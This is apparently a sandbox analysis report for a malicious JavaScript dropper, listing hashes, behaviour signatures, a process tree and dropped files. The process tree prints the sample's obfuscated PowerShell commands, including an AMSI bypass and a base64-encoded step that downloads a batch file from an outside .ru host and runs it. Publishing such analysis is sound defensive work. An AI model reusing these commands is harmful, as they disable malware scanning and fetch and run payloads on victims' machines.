Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    07/02/2025, 05:14

General

  • Target

    cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c.js

  • Size

    10KB

  • MD5

    14b3fe437467996209704e6ebaac0f0a

  • SHA1

    76352226e921e8cf57746c551735cd913c3e45c8

  • SHA256

    cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c

  • SHA512

    a4bbc226b4e35afa37702d852325a83103570b01ed76b151ab05a1f96ff855fa12579836dea116e5a9e64bbec63606773ac49ac3b2147a2cd001f46e4d8f93de

  • SSDEEP

    192:mpu81rs1WEVHAq/azhC8bw33tDMRI7xxYG8N0vJod67czsGSVXi:mU81rW1lTyzM33du0viCczSXi

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\cd123c288f623878218be31125000441bb8c5447375af67bc3c1d27d16eb5f8c.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2832
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\apk.js"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C $FEIfwuioehfaiwyYOETWTRuwye = 'a'+'ms'+'iI'+'ni'+'tF'+'a'; $EF8034uowieypowiue = 'il'+'ed'; $Ceoiuwjoeuyfw = 'Sy'+'st'+'em.Ma'+'na'+'gem'+'ent.'+'Aut'+'omat'+'io'+'n.A'+'ms'+'iUt'+'ils'; $DFiowjhOHWOHEOUF = $null; sleep 1; $text = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('W1JlZl0uQXNzZW1ibHkuR2V0VHlwZSgkQ2VvaXV3am9ldXlmdykuR2V0RmllbGQoJEZFSWZ3dWlvZWhmYWl3eVlPRVRXVFJ1d3llICsgJEVGODAzNHVvd2lleXBvd2l1ZSwiTm9uUCIgKyAidWIiICsgImxpYyxTdCIgKyAiYXRpYyIpLlNldFZhbHVlKCRERmlvd2poT0hXT0hFT1VGLCR0cnVlKQ==')); iex $text; sleep 1;$BBQ = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovL3NvdXRobGFuZGVyLnJ1L2RrbGZoZ2pkZmhnamQ3OGtoZGdmamdoL2FrdC5iYXQiIC1PdXRGaWxlICIkZW52OlRFTVBcYWt0LmJhdCI7IEludm9rZS1FeHByZXNzaW9uICIkZW52OlRFTVBcYWt0LmJhdCI7')); $CCQ = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($BBQ)); Powershell -E $CCQ
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwBzAG8AdQB0AGgAbABhAG4AZABlAHIALgByAHUALwBkAGsAbABmAGgAZwBqAGQAZgBoAGcAagBkADcAOABrAGgAZABnAGYAagBnAGgALwBhAGsAdAAuAGIAYQB0ACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYQBrAHQALgBiAGEAdAAiADsAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYQBrAHQALgBiAGEAdAAiADsA
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2304

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\apk.js

    Filesize

    3KB

    MD5

    a56dc65b1a1a28d7bedae072e521150d

    SHA1

    975296e54e8f05b793187048152903ec85d21868

    SHA256

    2da128f83fbae17fd5eadb31bc36be585d8b7c5982355288b58c4d8a4554254e

    SHA512

    6e04f9a0f56990e2d534a1f9bf9ececdad03182160d6236c570181d3848cd6ea838bbeeb12a53d29ba597c8634c21fdd2614b4c10f7412afd40d89bef3f155ec

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    e8da35864cd561cbbb8cefd7e330b2b9

    SHA1

    555b47ca3e2927a51206959c767eecc53e1601ef

    SHA256

    38a1ad206c2f866b9cbdfd50ec1defc68a4af674203ff0547283a71d31212e00

    SHA512

    3eeeb2fffdfed3a80a18498e7b40f97bf52e0fc64b5d3434e4771b068530e35b50b38d05f19aa389edc9caf7007492e680c1ce0ae1e0a7f8b70610379bd2968f

  • memory/2724-8-0x000000001B700000-0x000000001B9E2000-memory.dmp

    Filesize

    2.9MB

  • memory/2724-9-0x0000000002070000-0x0000000002078000-memory.dmp

    Filesize

    32KB